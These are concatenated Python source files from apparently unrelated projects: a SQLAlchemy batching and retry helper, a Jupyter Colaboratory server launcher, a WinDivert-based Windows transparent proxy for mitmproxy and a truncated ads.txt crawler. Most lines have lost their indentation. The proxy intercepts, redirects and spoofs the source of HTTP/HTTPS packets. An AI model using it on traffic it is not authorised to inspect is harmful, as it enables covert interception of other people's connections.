Iterates over the query output with SQLAlchemy's yield_per
(which returns rows one by one), groups the rows into bunches
of bunch_by elements and returns a list of bunches.
:param query: sqlalchemy session query
:param bunch_by: integer number
:returns: [[bunch_of_tuples_1],[bunch_of_tuples_2],...]
"""
filtered_bunches = []
item_bunch = []
for i in query.yield_per(bunch_by):
# i is either tuple of one element (token/model object etc.)
if not isinstance(i, tuple) and not isinstance(i, list):
item_bunch.append(i)
# or i is a tuple with the column elements per row
else:
item_bunch += i
if len(item_bunch) % bunch_by == 0:
filtered_bunches.append(item_bunch)
item_bunch = []
if item_bunch:
filtered_bunches.append(item_bunch)
return filtered_bunches
class retry:
"""Retry callable object with configuragle number of attempts"""
def __init__(self, func, *args, **kwargs):
'''
:param func: a method that should be executed with retries
:param args: parameters of the func
:param kwargs: key word arguments of the func
'''
self.func, self.args, self.kwargs = func, args, kwargs
def __call__(self, mtries=3, logger=None):
'''
:param mtries: maximum number of attempts to execute the function
:param logger: preferred logger
'''
attempt = mtries
while attempt > 1:
try:
if logger:
logger.debug('{}: Attempt {}'.format(self.func.__name__, mtries - attempt + 1))
return self.func(*self.args, **self.kwargs)
except Exception as e:
if logger:
logger.debug('{}: Attempt failed {}'.format(self.func.__name__, mtries - attempt + 1))
logger.debug(str(e))
attempt -= 1
return self.func(*self.args, **self.kwargs)
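# A small usage sketch for the retry wrapper above; `flaky_call` stands in for
# any callable that may raise, and the logger is optional.
def _example_retry(flaky_call, logger=None):
    # up to 3 attempts; the final attempt propagates any exception to the caller
    return retry(flaky_call)(mtries=3, logger=logger)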
|
colaboratory.py
|
# coding: utf-8
"""Colaboratory: the Jupyter Collaborative Computational Laboratory.
"""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import print_function
import errno
import json
import logging
import os
import random
import select
import signal
import socket
import sys
import threading
import webbrowser
# check for pyzmq 2.1.11
from IPython.utils.zmqrelated import check_for_zmq
check_for_zmq('2.1.11', 'IPython.html')
from jinja2 import Environment, FileSystemLoader
# Install the pyzmq ioloop. This has to be done before anything else from
# tornado is imported.
from zmq.eventloop import ioloop
ioloop.install()
# check for tornado 3.1.0
msg = "The Jupyter Colaboratory requires tornado >= 3.1.0"
try:
import tornado
except ImportError:
raise ImportError(msg)
try:
version_info = tornado.version_info
except AttributeError:
raise ImportError(msg + ", but you have < 1.1.0")
if version_info < (3,1,0):
raise ImportError(msg + ", but you have %s" % tornado.version)
from tornado import httpserver
from tornado import web
from tornado.log import LogFormatter
from IPython.html import DEFAULT_STATIC_FILES_PATH
from IPython.html.log import log_request
from IPython.html.services.kernels.kernelmanager import MappingKernelManager
from IPython.html.base.handlers import FileFindHandler
from IPython.config.application import catch_config_error
from IPython.core.application import (
BaseIPythonApplication, base_flags, base_aliases,
)
from IPython.core.profiledir import ProfileDir
from IPython.kernel import KernelManager
from IPython.kernel.zmq.session import default_secure, Session
from IPython.utils.importstring import import_item
from IPython.utils import submodule
from IPython.utils.traitlets import (
Dict, Unicode, Integer, List, Bool, Bytes,
DottedObjectName,
)
#-----------------------------------------------------------------------------
# Module globals
#-----------------------------------------------------------------------------
pjoin = os.path.join
here = os.path.dirname(__file__)
RESOURCES = pjoin(here, 'resources')
_examples = """
colab # start the server
colab --profile=sympy # use the sympy profile
"""
#-----------------------------------------------------------------------------
# Helper functions
#-----------------------------------------------------------------------------
def random_ports(port, n):
"""Generate a list of n random ports near the given port.
The first 5 ports will be sequential, and the remaining n-5 will be
randomly selected in the range [port-2*n, port+2*n].
"""
for i in range(min(5, n)):
yield port + i
for i in range(n-5):
yield max(1, port + random.randint(-2*n, 2*n))
def load_handlers(name):
"""Load the (URL pattern, handler) tuples for each component."""
name = 'IPython.html.' + name
mod = __import__(name, fromlist=['default_handlers'])
return mod.default_handlers
#-----------------------------------------------------------------------------
# The Tornado web application
#-----------------------------------------------------------------------------
class SingleStaticFileHandler(web.StaticFileHandler):
def get_absolute_path(self, root, path):
p = os.path.abspath(os.path.join(self.root, self.default_filename))
return p
class ColaboratoryWebApplication(web.Application):
def __init__(self, ipython_app, kernel_manager, notebook_manager,
session_manager, log,
settings_overrides, jinja_env_options):
settings = self.init_settings(
ipython_app, kernel_manager, notebook_manager,
session_manager, log,
settings_overrides, jinja_env_options)
handlers = self.init_handlers(settings)
super(ColaboratoryWebApplication, self).__init__(handlers, **settings)
def init_settings(self, ipython_app, kernel_manager, notebook_manager,
session_manager,
log, settings_overrides,
jinja_env_options=None):
template_path = settings_overrides.get("template_path", os.path.join(os.path.dirname(__file__), "templates"))
jenv_opt = jinja_env_options if jinja_env_options else {}
env = Environment(loader=FileSystemLoader(template_path), **jenv_opt)
settings = dict(
# basics
log_function=log_request,
base_url='/',
template_path=template_path,
# authentication
cookie_secret=ipython_app.cookie_secret,
login_url='/login',
password=ipython_app.password,
# managers
kernel_manager=kernel_manager,
notebook_manager=notebook_manager,
session_manager=session_manager,
# IPython stuff
config=ipython_app.config,
jinja2_env=env,
)
# allow custom overrides for the tornado web app.
settings.update(settings_overrides)
return settings
def init_handlers(self, settings):
# Load the (URL pattern, handler) tuples for each component.
here = os.path.dirname(__file__)
colab = pjoin(RESOURCES, 'colab')
handlers = [(r'/', web.RedirectHandler, {'url':'/welcome'}),
(r'/welcome(/?)', SingleStaticFileHandler,
{'path': colab, 'default_filename': 'welcome.html'}),
(r'/notebook(/?)', SingleStaticFileHandler,
{'path': colab, 'default_filename': 'notebook.html'}),
(r'/colab/(.*)', web.StaticFileHandler,
{'path': colab}),
(r'/extern/(.*)', web.StaticFileHandler,
{'path': pjoin(RESOURCES, 'extern')}),
(r'/closure/(.*)', web.StaticFileHandler,
{'path': pjoin(RESOURCES, 'closure-library', 'closure', 'goog')}),
(r'/ipython/(.*)', FileFindHandler,
{'path': [pjoin(RESOURCES, 'ipython_patch'), DEFAULT_STATIC_FILES_PATH]}),
]
handlers.extend(load_handlers('base.handlers'))
handlers.extend(load_handlers('services.kernels.handlers'))
handlers.extend(load_handlers('services.sessions.handlers'))
return handlers
#-----------------------------------------------------------------------------
# Aliases and Flags
#-----------------------------------------------------------------------------
flags = dict(base_flags)
flags['no-browser']=(
{'ColaboratoryApp' : {'open_browser' : False}},
"Don't open the notebook in a browser after startup."
)
# Add notebook manager flags
aliases = dict(base_aliases)
aliases.update({
'ip': 'ColaboratoryApp.ip',
'port': 'ColaboratoryApp.port',
'port-retries': 'ColaboratoryApp.port_retries',
'transport': 'KernelManager.transport',
'keyfile': 'ColaboratoryApp.keyfile',
'certfile': 'ColaboratoryApp.certfile',
'browser': 'ColaboratoryApp.browser',
})
#-----------------------------------------------------------------------------
# ColaboratoryApp
#-----------------------------------------------------------------------------
class ColaboratoryApp(BaseIPythonApplication):
name = 'jupyter-colaboratory'
description = """
The Jupyter Colaboratory.
This launches a Tornado based HTML Server that can run local Jupyter
kernels while storing the notebook files in Google Drive, supporting
real-time collaborative editing of the notebooks.
"""
examples = _examples
aliases = aliases
flags = flags
classes = [
KernelManager, ProfileDir, Session, MappingKernelManager,
]
flags = Dict(flags)
aliases = Dict(aliases)
kernel_argv = List(Unicode)
_log_formatter_cls = LogFormatter
def _log_level_default(self):
return logging.INFO
def _log_datefmt_default(self):
"""Exclude date from default date format"""
return "%H:%M:%S"
# create requested profiles by default, if they don't exist:
auto_create = Bool(True)
# Network related information.
ip = Unicode('127.0.0.1', config=True,
help="The IP address the notebook server will listen on."
)
def _ip_changed(self, name, old, new):
if new == u'*': self.ip = u''
port = Integer(8844, config=True,
help="The port the notebook server will listen on."
)
port_retries = Integer(50, config=True,
help="The number of additional ports to try if the specified port is not available."
)
certfile = Unicode(u'', config=True,
help="""The full path to an SSL/TLS certificate file."""
)
keyfile = Unicode(u'', config=True,
help="""The full path to a private key file for usage with SSL/TLS."""
)
cookie_secret = Bytes(b'', config=True,
help="""The random bytes used to secure cookies.
By default this is a new random number every time you start the Notebook.
Set it to a value in a config file to enable logins to persist across server sessions.
Note: Cookie secrets should be kept private, do not share config files with
cookie_secret stored in plaintext (you can read the value from a file).
"""
)
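# Illustrative only (not part of the original app): one way to persist the cookie
# secret across restarts is to read it from a file inside the profile's config file
# (e.g. ipython_notebook_config.py -- an assumed file name):
#
#     with open('/path/to/cookie_secret.bin', 'rb') as f:  # hypothetical path
#         c.ColaboratoryApp.cookie_secret = f.read()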
def _cookie_secret_default(self):
return os.urandom(1024)
password = Unicode(u'', config=True,
help="""Hashed password to use for web authentication.
To generate, type in a python/IPython shell:
from IPython.lib import passwd; passwd()
The string should be of the form type:salt:hashed-password.
"""
)
open_browser = Bool(True, config=True,
help="""Whether to open in a browser after starting.
The specific browser used is platform dependent and
determined by the python standard library `webbrowser`
module, unless it is overridden using the --browser
(ColaboratoryApp.browser) configuration option.
""")
browser = Unicode(u'', config=True,
help="""Specify what command to use to invoke a web
browser when opening the notebook. If not specified, the
default browser will be determined by the `webbrowser`
standard library module, which allows setting of the
BROWSER environment variable to override it.
""")
webapp_settings = Dict(config=True,
help="Supply overrides for the tornado.web.Application that the "
"IPython notebook uses.")
jinja_environment_options = Dict(config=True,
help="Supply extra arguments that will be passed to Jinja environment.")
notebook_manager_class = DottedObjectName('IPython.html.services.notebooks.filenbmanager.FileNotebookManager',
config=True,
help='The notebook manager class to use.'
)
kernel_manager_class = DottedObjectName('IPython.html.services.kernels.kernelmanager.MappingKernelManager',
config=True,
help='The kernel manager class to use.'
)
session_manager_class = DottedObjectName('IPython.html.services.sessions.sessionmanager.SessionManager',
config=True,
help='The session manager class to use.'
)
trust_xheaders = Bool(False, config=True,
help=("Whether to trust or not X-Scheme/X-Forwarded-Proto and X-Real-Ip/X-Forwarded-For headers"
"sent by the upstream reverse proxy. Necessary if the proxy handles SSL")
)
info_file = Unicode()
def _info_file_default(self):
info_file = "nbserver-%s.json"%os.getpid()
return os.path.join(self.profile_dir.security_dir, info_file)
def init_kernel_argv(self):
"""construct the kernel arguments"""
# Kernel should get *absolute* path to profile directory
self.kernel_argv = ["--profile-dir", self.profile_dir.location]
def init_configurables(self):
# force Session default to be secure
default_secure(self.config)
kls = import_item(self.kernel_manager_class)
self.kernel_manager = kls(
parent=self, log=self.log, kernel_argv=self.kernel_argv,
connection_dir = self.profile_dir.security_dir,
)
kls = import_item(self.notebook_manager_class)
self.notebook_manager = kls(parent=self, log=self.log)
kls = import_item(self.session_manager_class)
self.session_manager = kls(parent=self, log=self.log)
def init_logging(self):
# This prevents double log messages because tornado uses a root logger that
# self.log is a child of. The logging module dispatches log messages to a logger
# and all of its ancestors until propagate is set to False.
self.log.propagate = False
# hook up tornado 3's loggers to our app handlers
logger = logging.getLogger('tornado')
logger.propagate = True
logger.parent = self.log
logger.setLevel(self.log.level)
def init_webapp(self):
"""initialize tornado webapp and httpserver"""
self.web_app = ColaboratoryWebApplication(
self, self.kernel_manager, self.notebook_manager,
self.session_manager,
self.log, self.webapp_settings,
self.jinja_environment_options
)
if self.certfile:
ssl_options = dict(certfile=self.certfile)
if self.keyfile:
ssl_options['keyfile'] = self.keyfile
else:
ssl_options = None
self.web_app.password = self.password
self.http_server = httpserver.HTTPServer(self.web_app, ssl_options=ssl_options,
xheaders=self.trust_xheaders)
if not self.ip:
warning = "WARNING: The notebook server is listening on all IP addresses"
if ssl_options is None:
self.log.critical(warning + " and not using encryption. This "
"is not recommended.")
if not self.password:
self.log.critical(warning + " and not using authentication. "
"This is highly insecure and not recommended.")
success = None
for port in random_ports(self.port, self.port_retries+1):
try:
self.http_server.listen(port, self.ip)
except socket.error as e:
if e.errno == errno.EADDRINUSE:
self.log.info('The port %i is already in use, trying another random port.' % port)
continue
elif e.errno in (errno.EACCES, getattr(errno, 'WSAEACCES', errno.EACCES)):
self.log.warn("Permission to listen on port %i denied" % port)
continue
else:
raise
else:
self.port = port
success = True
break
if not success:
self.log.critical('ERROR: the notebook server could not be started because '
'no available port could be found.')
self.exit(1)
@property
def display_url(self):
ip = self.ip if self.ip else '[all ip addresses on your system]'
return self._url(ip)
@property
def connection_url(self):
ip = self.ip if self.ip else 'localhost'
return self._url(ip)
def _url(self, ip):
proto = 'https' if self.certfile else 'http'
return "%s://%s:%i" % (proto, ip, self.port)
def init_signal(self):
if not sys.platform.startswith('win'):
signal.signal(signal.SIGINT, self._handle_sigint)
signal.signal(signal.SIGTERM, self._signal_stop)
if hasattr(signal, 'SIGUSR1'):
# Windows doesn't support SIGUSR1
signal.signal(signal.SIGUSR1, self._signal_info)
if hasattr(signal, 'SIGINFO'):
# only on BSD-based systems
signal.signal(signal.SIGINFO, self._signal_info)
def _handle_sigint(self, sig, frame):
"""SIGINT handler spawns confirmation dialog"""
# register more forceful signal handler for ^C^C case
signal.signal(signal.SIGINT, self._signal_stop)
# request confirmation dialog in bg thread, to avoid
# blocking the App
thread = threading.Thread(target=self._confirm_exit)
thread.daemon = True
thread.start()
def _restore_sigint_handler(self):
"""callback for restoring original SIGINT handler"""
signal.signal(signal.SIGINT, self._handle_sigint)
def _confirm_exit(self):
"""confirm shutdown on ^C
A second ^C, or answering 'y' within 5s will cause shutdown,
otherwise original SIGINT handler will be restored.
This doesn't work on Windows.
"""
info = self.log.info
info('interrupted')
print(self.notebook_info())
sys.stdout.write("Shutdown this notebook server (y/[n])? ")
sys.stdout.flush()
r,w,x = select.select([sys.stdin], [], [], 5)
if r:
line = sys.stdin.readline()
if line.lower().startswith('y') and 'n' not in line.lower():
self.log.critical("Shutdown confirmed")
ioloop.IOLoop.instance().stop()
return
else:
print("No answer for 5s:", end=' ')
print("resuming operation...")
# no answer, or answer is no:
# set it back to original SIGINT handler
# use IOLoop.add_callback because signal.signal must be called
# from main thread
ioloop.IOLoop.instance().add_callback(self._restore_sigint_handler)
def _signal_stop(self, sig, frame):
self.log.critical("received signal %s, stopping", sig)
ioloop.IOLoop.instance().stop()
def _signal_info(self, sig, frame):
print(self.notebook_info())
def init_components(self):
"""Check the components submodule, and warn if it's unclean"""
status = submodule.check_submodule_status()
if status == 'missing':
self.log.warn("components submodule missing, running `git submodule update`")
submodule.update_submodules(submodule.ipython_parent())
elif status == 'unclean':
self.log.warn("components submodule unclean, you may see 404s on static/components")
self.log.warn("run `setup.py submodule` or `git submodule update` to update")
@catch_config_error
def initialize(self, argv=None):
super(ColaboratoryApp, self).initialize(argv)
self.init_logging()
self.init_kernel_argv()
self.init_configurables()
self.init_components()
self.init_webapp()
self.init_signal()
def cleanup_kernels(self):
"""Shutdown all kernels.
The kernels will shut down themselves when this process no longer exists,
but explicit shutdown allows the KernelManagers to cleanup the connection files.
"""
self.log.info('Shutting down kernels')
self.kernel_manager.shutdown_all()
def notebook_info(self):
"Return the current working directory and the server url information"
info = self.notebook_manager.info_string() + "\n"
info += "%d active kernels \n" % len(self.kernel_manager._kernels)
return info + "The IPython Notebook is running at: %s" % self.display_url
def server_info(self):
"""Return a JSONable dict of information about this server."""
return {'url': self.connection_url,
'hostname': self.ip if self.ip else 'localhost',
'port': self.port,
'secure': bool(self.certfile),
}
def write_server_info_file(self):
"""Write the result of server_info() to the JSON file info_file."""
with open(self.info_file, 'w') as f:
json.dump(self.server_info(), f, indent=2)
def remove_server_info_file(self):
"""Remove the nbserver-<pid>.json file created for this server.
Ignores the error raised when the file has already been removed.
"""
try:
os.unlink(self.info_file)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def start(self):
""" Start the IPython Notebook server app, after initialization
This method takes no arguments so all configuration and initialization
must be done prior to calling this method."""
if self.subapp is not None:
return self.subapp.start()
info = self.log.info
for line in self.notebook_info().split("\n"):
info(line)
info("Use Control-C to stop this server and shut down all kernels (twice to skip confirmation).")
self.write_server_info_file()
if self.open_browser:
try:
browser = webbrowser.get(self.browser or None)
except webbrowser.Error as e:
self.log.warn('No web browser found: %s.' % e)
browser = None
if browser:
b = lambda : browser.open(self.connection_url,
new=2)
threading.Thread(target=b).start()
try:
ioloop.IOLoop.instance().start()
except KeyboardInterrupt:
info("Interrupted...")
finally:
self.cleanup_kernels()
self.remove_server_info_file()
#-----------------------------------------------------------------------------
# Main entry point
#-----------------------------------------------------------------------------
launch_new_instance = ColaboratoryApp.launch_instance
|
windows.py
|
import collections
import ctypes
import ctypes.wintypes
import os
import socket
import struct
import threading
import time
import configargparse
from pydivert import enum
from pydivert import windivert
from six.moves import cPickle as pickle
from six.moves import socketserver
PROXY_API_PORT = 8085
class Resolver(object):
def __init__(self):
TransparentProxy.setup()
self.socket = None
self.lock = threading.RLock()
self._connect()
def _connect(self):
if self.socket:
self.socket.close()
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.connect(("127.0.0.1", PROXY_API_PORT))
self.wfile = self.socket.makefile('wb')
self.rfile = self.socket.makefile('rb')
pickle.dump(os.getpid(), self.wfile)
def original_addr(self, csock):
client = csock.getpeername()[:2]
with self.lock:
try:
pickle.dump(client, self.wfile)
self.wfile.flush()
addr = pickle.load(self.rfile)
if addr is None:
raise RuntimeError("Cannot resolve original destination.")
addr = list(addr)
addr[0] = str(addr[0])
addr = tuple(addr)
return addr
except (EOFError, socket.error):
self._connect()
return self.original_addr(csock)
class APIRequestHandler(socketserver.StreamRequestHandler):
"""
TransparentProxy API: Returns the pickled server address, port tuple
for each received pickled client address, port tuple.
"""
def handle(self):
proxifier = self.server.proxifier
pid = None
try:
pid = pickle.load(self.rfile)
if pid is not None:
proxifier.trusted_pids.add(pid)
while True:
client = pickle.load(self.rfile)
server = proxifier.client_server_map.get(client, None)
pickle.dump(server, self.wfile)
self.wfile.flush()
except (EOFError, socket.error):
proxifier.trusted_pids.discard(pid)
class APIServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
def __init__(self, proxifier, *args, **kwargs):
socketserver.TCPServer.__init__(self, *args, **kwargs)
self.proxifier = proxifier
self.daemon_threads = True
# Windows error.h
ERROR_INSUFFICIENT_BUFFER = 0x7A
# http://msdn.microsoft.com/en-us/library/windows/desktop/bb485761(v=vs.85).aspx
class MIB_TCPROW2(ctypes.Structure):
_fields_ = [
('dwState', ctypes.wintypes.DWORD),
('dwLocalAddr', ctypes.wintypes.DWORD),
('dwLocalPort', ctypes.wintypes.DWORD),
('dwRemoteAddr', ctypes.wintypes.DWORD),
('dwRemotePort', ctypes.wintypes.DWORD),
('dwOwningPid', ctypes.wintypes.DWORD),
('dwOffloadState', ctypes.wintypes.DWORD)
]
# http://msdn.microsoft.com/en-us/library/windows/desktop/bb485772(v=vs.85).aspx
def MIB_TCPTABLE2(size):
class _MIB_TCPTABLE2(ctypes.Structure):
_fields_ = [('dwNumEntries', ctypes.wintypes.DWORD),
('table', MIB_TCPROW2 * size)]
return _MIB_TCPTABLE2()
class TransparentProxy(object):
"""
Transparent Windows Proxy for mitmproxy based on WinDivert/PyDivert.
Requires elevated (admin) privileges. Can be started separately by manually running the file.
This module can be used to intercept and redirect all traffic that is forwarded by the user's machine and
traffic sent from the machine itself.
How it works:
(1) First, we intercept all packets that match our filter (destination port 80 and 443 by default).
We consider both traffic that is forwarded by the OS (WinDivert's NETWORK_FORWARD layer) and traffic
sent from the local machine (WinDivert's NETWORK layer). In the case of traffic from the local machine, we need to
distinguish between traffic sent from applications and traffic sent from the proxy. To accomplish this, we use
Windows' GetTcpTable2 syscall to determine the source application's PID.
For each intercepted packet, we
1. Store the source -> destination mapping (address and port).
2. Remove the packet from the network (by not reinjecting it).
3. Re-inject the packet into the local network stack, but with the destination address changed to the proxy.
(2) Next, the proxy receives the forwarded packet, but does not yet know the real destination (which we overwrote
with the proxy's address). On Linux, we would now call getsockopt(SO_ORIGINAL_DST), but that unfortunately doesn't
work on Windows. However, we still have the correct source information. As a workaround, we access the forward
module's API (see APIRequestHandler), submit the source information and get the actual destination back (which the
forward module stored in (1.3)).
(3) The proxy now establishes the upstream connection as usual.
(4) Finally, the proxy sends the response back to the client. To make this work, we need to change the packet's source
address back to the original destination (using the mapping from (1.3)), which the client believes it is talking to.
Limitations:
- No IPv6 support. (Pull requests welcome.)
- TCP ports do not get re-used simultaneously on the client, i.e. the proxy will fail if application X
connects to example.com and example.org from 192.168.0.42:4242 simultaneously. This could be mitigated by
introducing unique "meta-addresses" which mitmproxy sees, but this would remove the correct client info from
mitmproxy.
"""
def __init__(self,
mode="both",
redirect_ports=(80, 443), custom_filter=None,
proxy_addr=False, proxy_port=8080,
api_host="localhost", api_port=PROXY_API_PORT,
cache_size=65536):
"""
:param mode: Redirection operation mode: "forward" to only redirect forwarded packets, "local" to only redirect
packets originating from the local machine, "both" to redirect both.
:param redirect_ports: if the destination port is in this tuple, the requests are redirected to the proxy.
:param custom_filter: specify a custom WinDivert filter to select packets that should be intercepted. Overrides
redirect_ports setting.
:param proxy_addr: IP address of the proxy (IP within a network, 127.0.0.1 does not work). By default,
this is detected automatically.
:param proxy_port: Port the proxy is listening on.
:param api_host: Host the forward module API is listening on.
:param api_port: Port the forward module API is listening on.
:param cache_size: Maximum number of connection tuples that are stored. Only relevant in very high
load scenarios.
"""
if proxy_port in redirect_ports:
raise ValueError("The proxy port must not be a redirect port.")
if not proxy_addr:
# Auto-Detect local IP.
# https://stackoverflow.com/questions/166506/finding-local-ip-addresses-using-pythons-stdlib
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
proxy_addr = s.getsockname()[0]
s.close()
self.mode = mode
self.proxy_addr, self.proxy_port = proxy_addr, proxy_port
self.connection_cache_size = cache_size
self.client_server_map = collections.OrderedDict()
self.api = APIServer(self, (api_host, api_port), APIRequestHandler)
self.api_thread = threading.Thread(target=self.api.serve_forever)
self.api_thread.daemon = True
self.driver = windivert.WinDivert()
self.driver.register()
self.request_filter = custom_filter or " or ".join(
("tcp.DstPort == %d" %
p) for p in redirect_ports)
self.request_forward_handle = None
self.request_forward_thread = threading.Thread(
target=self.request_forward)
self.request_forward_thread.daemon = True
self.addr_pid_map = dict()
self.trusted_pids = set()
self.tcptable2 = MIB_TCPTABLE2(0)
self.tcptable2_size = ctypes.wintypes.DWORD(0)
self.request_local_handle = None
self.request_local_thread = threading.Thread(target=self.request_local)
self.request_local_thread.daemon = True
# The proxy server responds to the client. To the client,
# this response should look like it has been sent by the real target
self.response_filter = "outbound and tcp.SrcPort == %d" % proxy_port
self.response_handle = None
self.response_thread = threading.Thread(target=self.response)
self.response_thread.daemon = True
self.icmp_handle = None
@classmethod
def setup(cls):
# TODO: Make sure that server can be killed cleanly. That's a bit difficult as we don't have access to
# controller.should_exit when this is called.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_unavailable = s.connect_ex(("127.0.0.1", PROXY_API_PORT))
if server_unavailable:
proxifier = TransparentProxy()
proxifier.start()
def start(self):
self.api_thread.start()
# Block all ICMP requests (which are sent on Windows by default).
# In layman's terms: If we don't do this, our proxy machine tells the client that it can directly connect to the
# real gateway if they are on the same network.
self.icmp_handle = self.driver.open_handle(
filter="icmp",
layer=enum.Layer.NETWORK,
flags=enum.Flag.DROP)
self.response_handle = self.driver.open_handle(
filter=self.response_filter,
layer=enum.Layer.NETWORK)
self.response_thread.start()
if self.mode == "forward" or self.mode == "both":
self.request_forward_handle = self.driver.open_handle(
filter=self.request_filter,
layer=enum.Layer.NETWORK_FORWARD)
self.request_forward_thread.start()
if self.mode == "local" or self.mode == "both":
self.request_local_handle = self.driver.open_handle(
filter=self.request_filter,
layer=enum.Layer.NETWORK)
self.request_local_thread.start()
def shutdown(self):
if self.mode == "local" or self.mode == "both":
self.request_local_handle.close()
if self.mode == "forward" or self.mode == "both":
self.request_forward_handle.close()
self.response_handle.close()
self.icmp_handle.close()
self.api.shutdown()
def recv(self, handle):
"""
Convenience function that receives a packet from the passed handle and handles error codes.
If the process has been shut down, (None, None) is returned.
"""
try:
raw_packet, metadata = handle.recv()
return self.driver.parse_packet(raw_packet), metadata
except WindowsError as e:
if e.winerror == 995:
return None, None
else:
raise
def fetch_pids(self):
ret = ctypes.windll.iphlpapi.GetTcpTable2(
ctypes.byref(
self.tcptable2), ctypes.byref(
self.tcptable2_size), 0)
if ret == ERROR_INSUFFICIENT_BUFFER:
self.tcptable2 = MIB_TCPTABLE2(self.tcptable2_size.value)
self.fetch_pids()
elif ret == 0:
for row in self.tcptable2.table[:self.tcptable2.dwNumEntries]:
local = (
socket.inet_ntoa(struct.pack('L', row.dwLocalAddr)),
socket.htons(row.dwLocalPort)
)
self.addr_pid_map[local] = row.dwOwningPid
else:
raise RuntimeError("Unknown GetTcpTable2 return code: %s" % ret)
def request_local(self):
while True:
packet, metadata = self.recv(self.request_local_handle)
if not packet:
return
client = (packet.src_addr, packet.src_port)
if client not in self.addr_pid_map:
self.fetch_pids()
# If this fails, we most likely have a connection from an external client to
# a local server on 80/443. In this case, we always want to proxy
# the request.
pid = self.addr_pid_map.get(client, None)
if pid not in self.trusted_pids:
self._request(packet, metadata)
else:
self.request_local_handle.send((packet.raw, metadata))
def request_forward(self):
"""
Redirect packets to the proxy
"""
while True:
packet, metadata = self.recv(self.request_forward_handle)
if not packet:
return
self._request(packet, metadata)
def _request(self, packet, metadata):
# print(" * Redirect client -> server to proxy")
# print("%s:%s -> %s:%s" % (packet.src_addr, packet.src_port, packet.dst_addr, packet.dst_port))
client = (packet.src_addr, packet.src_port)
server = (packet.dst_addr, packet.dst_port)
if client in self.client_server_map:
# Force re-add to mark as "newest" entry in the dict.
del self.client_server_map[client]
while len(self.client_server_map) > self.connection_cache_size:
self.client_server_map.popitem(False)
self.client_server_map[client] = server
packet.dst_addr, packet.dst_port = self.proxy_addr, self.proxy_port
metadata.direction = enum.Direction.INBOUND
packet = self.driver.update_packet_checksums(packet)
# Use any handle that's on the NETWORK layer - request_local may be
# unavailable.
self.response_handle.send((packet.raw, metadata))
def response(self):
"""
Spoof source address of packets sent from the proxy to the client
"""
while True:
packet, metadata = self.recv(self.response_handle)
if not packet:
return
# If the proxy responds to the client, let the client believe the target server sent the packets.
# print(" * Adjust proxy -> client")
client = (packet.dst_addr, packet.dst_port)
server = self.client_server_map.get(client, None)
if server:
packet.src_addr, packet.src_port = server
else:
print("Warning: Previously unseen connection from proxy to %s:%s." % client)
packet = self.driver.update_packet_checksums(packet)
self.response_handle.send((packet.raw, metadata))
if __name__ == "__main__":
parser = configargparse.ArgumentParser(
description="Windows Transparent Proxy")
parser.add_argument(
'--mode',
choices=[
'forward',
'local',
'both'],
default="both",
help='redirection operation mode: "forward" to only redirect forwarded packets, '
'"local" to only redirect packets originating from the local machine')
group = parser.add_mutually_exclusive_group()
group.add_argument(
"--redirect-ports",
nargs="+",
type=int,
default=[
80,
443],
metavar="80",
help="ports that should be forwarded to the proxy")
group.add_argument(
"--custom-filter",
default=None,
metavar="WINDIVERT_FILTER",
help="Custom WinDivert interception rule.")
parser.add_argument("--proxy-addr", default=False,
help="Proxy Server Address")
parser.add_argument("--proxy-port", type=int, default=8080,
help="Proxy Server Port")
parser.add_argument("--api-host", default="localhost",
help="API hostname to bind to")
parser.add_argument("--api-port", type=int, default=PROXY_API_PORT,
help="API port")
parser.add_argument("--cache-size", type=int, default=65536,
help="Maximum connection cache size")
options = parser.parse_args()
proxy = TransparentProxy(**vars(options))
proxy.start()
print(" * Transparent proxy active.")
print(" Filter: {0}".format(proxy.request_filter))
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
print(" * Shutting down...")
proxy.shutdown()
print(" * Shut down.")
|
main.py
|
import asyncio
import datetime
import json
import logging
import queue
import threading
from typing import List
from elasticsearch import Elasticsearch
from sqlalchemy import create_engine
from sqlalchemy.exc import SQLAlchemyError, DBAPIError
from sqlalchemy.orm import sessionmaker
import validators
import adstxt.fetch as fetch
import adstxt.models as models
import adstxt.transform as transform
LOG = logging.getLogger(__name__)
class AdsTxtCrawler:
def __init__(self,
es,
file,
db_uri,
es_uri=None,
es_query=None,
es_index=None,
file_uri=None,
crawler_id=None):
self.es = es
self.file = file
self.db_uri = db_uri
self.es_uri = es_uri
self.es_query = es_query
self.es_index = es_index
self.file_uri = file_uri
self.crawler_id = crawler_id
self._session = sessionmaker()
self._testing = False
self.es = Elasticsearch(self.es_uri)
def _get_engine(self):
if 'mysql+pymysql' in self.db_uri:
connect_args = {'init_command': "SET @@collation_connection"
"='utf8mb4_unicode_ci'"}
LOG.info('Using connection string of %r and args of %r',
self.db_uri, connect_args)
return create_engine(self.db_uri,
pool_size=40,
connect_args=connect_args)
else:
LOG.info('Using local SQLite.')
connect_args = {}
return create_engine(self.db_uri,
connect_args=connect_args)
def _bootstrap_db(self):
"""Bootstrap the data stores, and create a shared session
object with the engine setup."""
self.engine = self._get_engine()
# Generate a root session object, this is configured locally
# and then shared. Each user of this will then scope their
# own session.
session = sessionmaker()
session.configure(bind=self.engine)
LOG.debug('Building tables.')
models.Base.metadata.create_all(self.engine)
LOG.debug('Built database.')
# Share our root session object.
self._session = session
def _last_updated_at(self, domain: str) -> datetime.datetime:
session = self._session()
# Check to see if the domain is present in the domains table.
db_domain = session.query(
models.Domain).filter_by(name=domain).first()
if not db_domain:
# Write it with a min time so we update it this first session.
db_domain = models.Domain(name=domain,
last_updated=datetime.datetime.min)
session.add(db_domain)
session.commit()
# Return last updated at time.
return db_domain.last_updated
def _check_viability(self, domain: str) -> bool:
"""Check to see if a domain is viable to be crawled.
Basic validation goes on here: first we assert that the domain
is in fact a valid domain, with a TLD and more info. From here we
check to see if we've crawled the domain recently.
Args:
domain (str): domain to precheck.
Returns:
bool: Truthy if a domain is viable to be scanned again,
Falsy if the domain has already been scanned or
does not pass validation.
"""
if not validators.domain(domain):
LOG.info('%r found to be an invalid domain.', domain)
return False
# Check to see if the domain is present in the domains table.
last_updated = self._last_updated_at(domain)
# Check to see when we last updated the domains data.
# If the last updated time was greater than six hours ago, check.
# TODO: We should get the cache control headers back off the page
